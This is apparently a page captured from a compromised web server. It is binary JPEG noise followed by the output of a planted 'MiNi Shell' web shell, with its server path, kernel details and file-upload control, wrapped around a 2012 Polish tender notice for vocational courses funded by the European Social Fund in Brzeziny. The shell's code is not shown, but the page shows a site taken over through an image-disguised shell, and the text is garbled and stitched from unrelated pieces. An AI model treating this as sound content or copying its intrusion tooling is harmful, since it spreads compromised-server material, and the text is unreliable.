JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120709/148733-N-2012.html

<p class="kh_header"><b>Brzeziny: Przeprowadzenie kursów zawodowych dla uczestników projektu pn.: Praktyka czyni mistrza realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działania 9.2: Podniesienie atrakcyjności i jakości szkolnictwa zawodowego współfinansowanego ze środków Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 148733 - 2012; data zamieszczenia: 09.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Brzeziński , ul. Sienkiewicza 16, 95-060 Brzeziny, woj. łódzkie, tel. 046 8741111, 8743164, faks 046 8741111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-brzeziny.4bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kursów zawodowych dla uczestników projektu pn.: Praktyka czyni mistrza realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działania 9.2: Podniesienie atrakcyjności i jakości szkolnictwa zawodowego współfinansowanego ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie kursów zawodowych dla uczestników projektu pn.: Praktyka czyni mistrza realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działania 9.2: Podniesienie atrakcyjności i jakości szkolnictwa zawodowego współfinansowanego ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca wykaże wykonanie lub wykonywanie usług tożsamych lub podobnych do objętych przedmiotem niniejszego zamówienia - w okresie ostatnich trzech lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  i wykaże, że wykonał należycie, co najmniej 1 usługę polegającą na przeprowadzeniu kursu / szkolenia odpowiednio do rodzaju kursu / szkolenia ,na które składa ofertę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 5.
- dysponowanie potencjałem technicznym - wózkami widłowymi jezdniowymi z napędami silnikowymi typu: naładowane, unoszące, podnośnikowe ciągnikowe, specjalne i   gazowe),</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1.
- przynajmniej  3 - letnie doświadczenie w pracy w renomowanej restauracji,

	Zadanie 2.
- uprawnienia do realizacji przedmiotu zamówienia tj. udokumentowany tytuł mistrzowski zgodny z przedmiotem zamówienia,
- prowadzenie działalności szkoleniowej zgodnej z przedmiotem zamówienia nie krócej niż 2 lata, a także co najmniej 2 letnie doświadczenie w prowadzeniu zajęć na kursach carvingu,

	Zadanie 3. 
- profesjonalny szef kuchni z przynajmniej 3 - letnim doświadczeniem pracy w renomowanej restauracji,

	Zadanie 4.
- osoby z co najmniej 3-letnim doświadczeniem w pracy na stanowisku księgowego,
	
	Zadanie 5.

- dysponowanie osobami zdolnymi do wykonania zamówienia - instruktorzy obsługi wózków widłowych z co najmniej 3 letnim doświadczeniem,
- dysponowanie placem manewrowym w celu odbycia zajęć praktycznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawcy posiadać będą opłaconą polisę OC lub inny dokument potwierdzający, że są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość od jednego i wszystkich zdarzeń, nie niższą niż 50 000 złotych (słownie:  pięćdziesiąt tysięcy złotych ), niezależnie od tego na ile zadań wykonawca składa ofertę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-brzeziny.4bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Brzezinach
ul. Sienkiewicza 16
95-060 Brzeziny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2012 godzina 13:00, miejsce: Starostwo Powiatowe w Brzezinach
ul. Sienkiewicza 16
95-060 Brzeziny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Praktyka czyni mistrza współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie kursu w zakresie kelner - barista.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie kursu w zakresie kelner - barista. Kurs obejmuje umiejętności takie jak:
- przygotowanie sali bankietowej ,
- nakrywanie do stołu,
- serwowanie dań i napojów,
- serwis win,
- dotlenianie wina i dekantacja,
- dobór napojów do potraw (wino, aperitif, digestif),
- savoir - vivre i konserwacja,
- rozwiązywanie trudnych sytuacji,
- przygotowanie i serwis ekspresu,
- rodzaje kaw i jej parzenie, 
- ubijanie mleka i piany do kawy,
- wzory lane z ręki i rysowane szpikulcem (sosy).


Czas trwania kursu:
40 h (wrzesień  - grudzień 2012). Zajęcia na kursie odbywać się będą według harmonogramu ustalonego przez Zamawiającego, poza godzinami zajęć szkolnych tj.: godziny popołudniowe od 15:00. i/lub weekendy.
Liczba uczestników kursu: 
20 osób (zarówno kobiety jak i mężczyźni).
Forma ukończenia kursu:	
Egzamin praktyczny i teoretyczny oraz certyfikat w języku polskim oraz języku angielskim.
Miejsce realizacji kursu: 
Zajęcia w siedzibie Zespołu Szkół Ponadgimnazjalnych w Brzezinach, ul. Konstytucji 3 Maja 5 (zamawiający dysponuje salą wykładową). 
Dodatkowe informacje:
Koszty zakupu  produktów (w tym artykułów spożywczych), do prowadzenia kursu pokrywa zamawiający, który dysponować będzie również profesjonalnym ekspresem do kawy, szafkami pomocnik kelnerski oraz zestawami narzędzi kelnerskich i barmańskich. W miejscu realizacji kursu do dyspozycji kursantów i prowadzących profesjonalne zaplecze kuchenne. 
Wymagane jest posiadanie uprawnień do prowadzenia kursów z zakresu kelnera-baristy i wystawienia certyfikatów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie kursu carvingu (rzeźbienie w owocach i warzywach)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie kursu carvingu (rzeźbienie w owocach i warzywach). 
Kurs obejmuje przeprowadzenie zajęć z zakresu:
-    Historii  i pochodzenia carvingu. Omówienie zasad bezpieczeństwa oraz sposoby używania narzędzi. 
-    Szczegółowego opisu czynności i technik potrzebnych do wykonania dekoracji z różnych warzyw i owoców.     
-    Tworzenia kompozycji z wykonanych elementów. Sposoby ich przechowywania.
Czas trwania kursu:
Kurs obejmuje 30 h (wrzesień 2012 - grudzień 2012).
Zajęcia na kursie odbywać się będą według harmonogramu ustalonego przez zamawiającego, poza godzinami zajęć szkolnych tj.: godziny popołudniowe od 15.00. i/lub weekendy.
Liczba uczestników kursu: 
15 osób (zarówno kobiety jak i mężczyźni)
Forma ukończenia kursu:
Egzamin praktyczny  oraz certyfikat w języku polskim oraz języku angielskim.
Miejsce realizacji kursu: 
Zajęcia w siedzibie Zespołu Szkół Ponadgimnazjalnych w Brzezinach, ul. Konstytucji 3 Maja 5 (zamawiający dysponuje salą wykładową). 
Dodatkowe informacje:
Koszty zakupu  narzędzi do carvingu i artykułów spożywczych do prowadzenia kursu pokrywa zamawiający. 
Wymagane jest posiadanie uprawnień do prowadzenia kursów i wystawienia certyfikatów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeprowadzenie kursu gastronomicznego w zakresie przygotowywania wykwintnych potraw (m.in. dziczyzna, owoce morza, ryby), efektownych deserów oraz ich dekorowania..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie kursu gastronomicznego w zakresie przygotowywania wykwintnych potraw (m.in. dziczyzna, owoce morza, ryby), efektownych deserów oraz ich dekorowania. 
Czas trwania kursu:
40 h (wrzesień  - grudzień 2012).
Zajęcia mogą odbywać się wyłącznie w czasie pozalekcyjnym, zgodnie z harmonogramem uzgodnionym i zaakceptowanym przez zamawiającego tj. godziny popołudniowe od 15.00. i/lub weekendy.
Liczba uczestników kursu: 
20 osób (zarówno kobiety jak i mężczyźni)
Forma ukończenia kursu:
Wykonawca zobowiązany będzie po ukończeniu kursu przeprowadzić egzamin wewnętrzny (egzamin praktyczny i teoretyczny) sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu tj. certyfikat w języku polskim oraz języku angielskim.
Miejsce realizacji kursu: 
Zajęcia w siedzibie Zespołu Szkół Ponadgimnazjalnych w Brzezinach, ul. Konstytucji 3 Maja 5 (zamawiający dysponuje salą wykładową). 
Dodatkowe informacje:
Koszty zakupu  produktów do prowadzenia kursu pokrywa zamawiający, który dysponować będzie piecem konwekcyjnym oraz zapleczem gastronomicznym.
Wymagane jest posiadanie uprawnień do prowadzenia kursów i wystawienia certyfikatów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przeprowadzenie kursu obsługi programów księgowych na programie Symfonia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie kursu obsługi programów księgowych na programie Symfonia, którego celem jest nabycie umiejętności praktycznych w zakresie:
- założenie nowej firmy w systemie,
- praca z planem kont,
- sporządzenie bilansu,
- ustalenie wyniku finansowego, 
- tworzenie zestawień i raportów finansowych,
- rozliczenia z US i ZUS.
Czas trwania kursu:
50 h (grudzień 2012 - luty 2013). Zajęcia na kursie odbywać się będą według harmonogramu ustalonego przez zamawiającego, poza godzinami zajęć szkolnych tj.: godziny popołudniowe od 15.00. i/lub weekendy.
Liczba uczestników kursu: 
20 osób (zarówno kobiety jak i mężczyźni).
Forma ukończenia kursu:
Wykonawca zobowiązany będzie po ukończeniu kursu przeprowadzić egzamin wewnętrzny (egzamin praktyczny i teoretyczny) sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu tj. certyfikat w języku polskim oraz języku angielskim.
Miejsce realizacji kursu: 
Zajęcia w siedzibie Zespołu Szkół Ponadgimnazjalnych w Brzezinach, ul. Konstytucji 3 Maja 5 (zamawiający dysponuje salą wykładową). 
Dodatkowe informacje:
Zamawiający dysponuje 5 komputerami z wymaganym oprogramowaniem.
Wymagane jest posiadanie uprawnień do prowadzenia kursów i wystawienia certyfikatów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przeprowadzenie kursu obsługi wózków widłowych jezdniowych z napędami silnikowymi typu: naładowane, unoszące, podnośnikowe ciągnikowe, specjalne i uprawnień do wymiany butli gazowych w wózkach gazowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie kursu obsługi wózków widłowych jezdniowych z napędami silnikowymi typu: naładowane, unoszące, podnośnikowe ciągnikowe, specjalne i uprawnień do wymiany butli gazowych w wózkach gazowych.
Kurs obejmuje obsługę wózków akumulatorowych typu: platformowe, podnośniki widłowe, układarki, a także obsługę wózków spalinowych w zakresie: załadunek, przewóz i rozładunek różnych surowców, półfabrykatów i towarów.
Czas trwania kursu:
30 h teorii i 18 h ćwiczeń na osobę (wrzesień 2012 - styczeń 2013).  Zajęcia na kursie odbywać się będą według harmonogramu ustalonego przez zamawiającego, poza godzinami zajęć szkolnych tj.: godziny popołudniowe od 15.00. i/lub weekendy.
Liczba uczestników kursu: 
30 osób (zarówno kobiety jak i mężczyźni).
Forma ukończenia kursu:
Egzamin praktyczny  i teoretyczny oraz certyfikat w języku polskim oraz języku angielskim.
Miejsce realizacji kursu: 
Zajęcia teoretyczne w siedzibie Zespołu Szkół Ponadgimnazjalnych w Brzezinach, ul. Konstytucji 3 Maja 5 (zamawiający dysponuje salą wykładową). 
Zajęcia praktyczne: Brzeziny, firma spoza Brzezin powinna uwzględnić w cenie kursu koszty dojazdu uczestników kursu na zajęcia praktyczne.
	Wymagane jest posiadanie uprawnień do prowadzenia kursów i wystawienia certyfikatów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com